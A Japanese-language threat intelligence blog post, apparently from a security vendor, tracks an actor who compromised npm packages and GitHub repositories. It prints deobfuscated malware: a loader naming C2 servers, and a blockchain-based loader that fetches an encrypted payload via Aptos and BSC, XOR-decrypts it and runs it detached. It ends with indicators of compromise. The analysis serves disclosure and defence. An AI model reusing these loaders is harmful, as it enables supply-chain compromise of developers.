最近のニュースで、脅威アクターグループがReact Native AriaおよびGlueStackに関連する16の人気パッケージを侵害したという話をご覧になったかもしれません。これは当社が発見し、文書化しました。 こちら以前、彼らがパッケージを侵害したことを検出しました。 rand-user-agent 2025年5月5日に、報告された通りです。 こちら.
それ以来、この脅威アクターは追跡されており、まだ公には完全に文書化されていない小規模な攻撃も確認されています。しかし、彼らの活動の全体像を提供するために、それらをまとめることにしました。
最初の悪意のあるパッケージ
2025年5月8日、当社のシステムは、NPM上で悪意のあると思われる2つの新しいパッケージについて既に警告を発していました。それらは次のとおりです。
これらは両方とも同じユーザーによってアップロードされました。 aminengineerings、メールアドレスで登録されています aminengineerings@gmail[.]com最初のバージョンから、両方とも悪意のあるペイロードを含んでおり、このパッケージが脅威アクター自身のものであることを示しています。
その他の悪意のあるパッケージ
gluestackへの攻撃後、攻撃者によってリリースされた追加の2つのパッケージも確認しました。これらのパッケージは2025年6月8日に以下の名前でリリースされました tailwindcss-animate-expand そして mongoose-lit。これらは「」というユーザーによってリリースされました mattfarser。そのユーザーはその後すぐに削除されました。
具体的には、 tailwindcss-animate-expand パッケージは、異なるペイロード構造を持つため注目に値します。その最初の部分は次のようになっています。
global['r']=require;(function(){var Afr='',xzH=906-895;...もはや global['_V'] 変数が設定されているのを確認できません。これをサンドボックスで実行すると、最終的なペイロードもわずかに異なることがわかります。難読化解除後のペイロードは次のようになります。
global._V = 'A4';
(async () => {
try {
const c = global.r || require;
const d = global._V || '0';
const f = c('os');
const g = c("path");
const h = c('fs');
const i = c('child_process');
const j = c('crypto');
const k = f.platform();
const l = k.startsWith("win");
const m = f.hostname();
const n = f.userInfo().username;
const o = f.type();
const p = f.release();
const q = o + " " + p;
const r = process.execPath;
const s = process.version;
const u = new Date().toISOString();
const v = process.cwd();
const w = typeof __filename === "undefined" || __filename !== "[eval]";
const x = typeof __dirname === 'undefined' ? v : __dirname;
const y = g.join(f.homedir(), ".node_modules");
if (typeof module === "object") {
module.paths.push(g.join(y, "node_modules"));
} else {
if (global._module) {
global._module.paths.push(g.join(y, "node_modules"));
} else {
if (global.m) {
global.m.paths.push(g.join(y, 'node_modules'));
}
}
}
async function z(V, W) {
return new global.Promise((X, Y) => {
i.exec(V, W, (Z, a0, a1) => {
if (Z) {
Y("Error: " + Z.message);
return;
}
if (a1) {
Y("Stderr: " + a1);
return;
}
X(a0);
});
});
}
function A(V) {
try {
c.resolve(V);
return true;
} catch (W) {
return false;
}
}
const B = A("axios");
const C = A("socket.io-client");
if (!B || !C) {
try {
const V = {
"stdio": "inherit",
windowsHide: true
};
const W = {
"stdio": "inherit",
"windowsHide": true
};
if (B) {
await z("npm --prefix \"" + y + "\" install socket.io-client", V);
} else {
await z("npm --prefix \"" + y + "\" install axios socket.io-client", W);
}
} catch (X) {}
}
const D = c("axios");
const E = c("form-data");
const F = c("socket.io-client");
let G;
let H;
let I = {};
const J = d.startsWith('A4') ? "http://136.0.9.8:3306" : "http://166.88.4.2:443";
const K = d.startsWith('A4') ? "http://136.0.9.8:27017" : "http://166.88.4.2:27017";
...
特に興味深いのは、バージョンが A4であることです。これは週末の攻撃で、新しいC2サーバーを使用するためのシグナルとして参照されました。
また、「古い」C2サーバーがもはや言及されていないことも確認できます。代わりに、IPアドレス 166.88.4[.]2.
警告の兆候
この攻撃に至るまで、いくつかの小さなパッケージが侵害されていることに気づいていました。私たちが確認したパッケージは以下の通りです。
これらのパッケージは3つの異なる個人に属しており、週ごとのダウンロード数は100未満です。これらの脅威アクターは、npmアカウントのトークンを継続的に侵害できているようです。
侵害されたGitHubリポジトリ
これらの攻撃をさらに調査する中で、脅威アクターがどのように活動しているかについてより深い洞察を提供する証拠を得るため、他のエコシステムを調査することにしました。その結果、同じ脅威アクターによって侵害されたGitHub上の19のリポジトリを検出しました。
これらのコミットの中には、いくつか注目すべきものがあります。例えば、以下の通りです。
脅威アクターは、使用するペイロードをわずかに変更しました。このケースでは、ペイロードをbase64エンコードし、それをeval()に渡しています。以下に、その機能についてコメントで説明を付けたデコード済みペイロードを示します。
/*****************************************************************************************
* Malware “loader” that hides its real payload on two block-chains. *
* Flow ⬇️ *
* 🥇 Step-1 Read pointer on Aptos *
* 🥈 Step-2 Use pointer on Binance Smart Chain (BSC) *
* 🥉 Step-3 Pull out hidden blob *
* 🗝️ Step-4 Decode & decrypt *
* 🚀 Step-5 Run it silently *
*****************************************************************************************/
/* ───────────────────────────── Bootstrap ───────────────────────────── */
global['r'] = require; // save `require` as global.r (little obfuscation)
(async () => {
/* quick aliases */
const c = global; // shorthand for `global`
const i = c['r']; // shorthand for `require`
/* 🛠 Helper 1: GET url → JSON */
async function e (url) {
return new Promise((resolve, reject) => {
i('https')
.get(url, res => {
let body = '';
res.on('data', chunk => (body += chunk));
res.on('end', () => {
try { resolve(JSON.parse(body)); } catch (err) { reject(err); }
});
})
.on('error', reject)
.end();
});
}
/* 🛠 Helper 2: call BSC JSON-RPC */
async function o (method, params = []) {
return new Promise((resolve, reject) => {
const payload = JSON.stringify({ jsonrpc: '2.0', method, params, id: 1 });
const opts = { hostname: 'bsc-dataseed.binance.org', method: 'POST' };
const req = i('https')
.request(opts, res => {
let body = '';
res.on('data', chunk => (body += chunk));
res.on('end', () => {
try { resolve(JSON.parse(body)); } catch (err) { reject(err); }
});
})
.on('error', reject);
req.write(payload);
req.end();
});
}
/* ─────────── Core routine that implements 🥇 → 🗝️ steps ─────────── */
async function t (aptosAccount) {
/* 🥇 STEP-1 Read pointer on Aptos */
const latestTx = await e(
`https://fullnode.mainnet.aptoslabs.com/v1/accounts/${aptosAccount}/transactions?limit=1`
);
const bscHash = latestTx[0].payload.arguments[0]; // pointer → BSC tx-hash
/* 🥈 STEP-2 Fetch BSC transaction carrying the payload */
const bscTx = await o('eth_getTransactionByHash', [bscHash]);
const hexBlob = bscTx.result.input.slice(2); // drop "0x"
/* 🥉 STEP-3 Pull out hidden blob (still unreadable) */
const rawText = Buffer.from(hexBlob, 'hex').toString('utf8');
const b64Chunk = rawText.split('..')[1]; // keep part after ".."
/* 🗝️ STEP-4 Decode & decrypt */
const encrypted = atob(b64Chunk); // Base-64 → binary string
const KEY = '$v$5;kmc$ldm*5SA';
let payload = '';
for (let j = 0; j < encrypted.length; j++) {
payload += String.fromCharCode(
encrypted.charCodeAt(j) ^ KEY.charCodeAt(j % KEY.length)
);
}
return payload; // plain-text JS to execute
}
/* 🚀 STEP-5 Run it silently in the background */
try {
const script = await t(
'0xe66ae4c5e9516048911b3ade1bc8b258197259604c1206cfeca01451a7c22e6d'
);
i('child_process')
.spawn(
'node',
['-e', `global['_V']='${c['_V'] || 0}';${script}`],
{ detached: true, stdio: 'ignore', windowsHide: true }
)
.on('error', () => { /* swallow child errors */ });
} catch (err) {
/* stay quiet on any failure */
}
})(); このコードは巧妙で、2つの異なるブロックチェーンのコンテンツから部分的に自己ブートストラップを行います。以下に、そのステップバイステップの概要を示します。
Binance Smart Chain上のトランザクションは以下で確認できます。ウォレットとコントラクトが2025年2月7日から存在していることは注目に値します。
https://bscscan.com/tx/0x5b28b2aa49bae766099aab7c74956d17c305079d9d3575256d3a72c310079c37
コードをサンドボックスで実行し、最終ペイロードを取得したところ、以前に文書化したペイロードと大きな変更なく同じものでした。
結論
脅威アクターは、npmパッケージだけでなくGitHubリポジトリも積極的に、かつ継続的に侵害していることが確認されます。さらに、彼らはRATを用いて自身のパッケージをデプロイする実験も行っています。また、悪意のあるコードを配布する手段としてブロックチェーンの使用も開始しました。
侵害の痕跡
パッケージ
solanautilweb3-socketiotailwindcss-animate-expandmongoose-lite@lfwfinance/sdk@lfwfinance/sdk-devalgorand-htlcavm-satoshi-dicebiatec-avm-gas-stationarc200-clientcputil-node
IPアドレス
166.88.4[.]2136.0.9[.]8
Aptosアカウント
0xe66ae4c5e9516048911b3ade1bc8b258197259604c1206cfeca01451a7c22e6d
BSCアドレス
0x9BC1355344B54DEDf3E44296916eD15653844509
BSCコントラクト
0x8EaC3198dD72f3e07108c4C7CFf43108AD48A71c
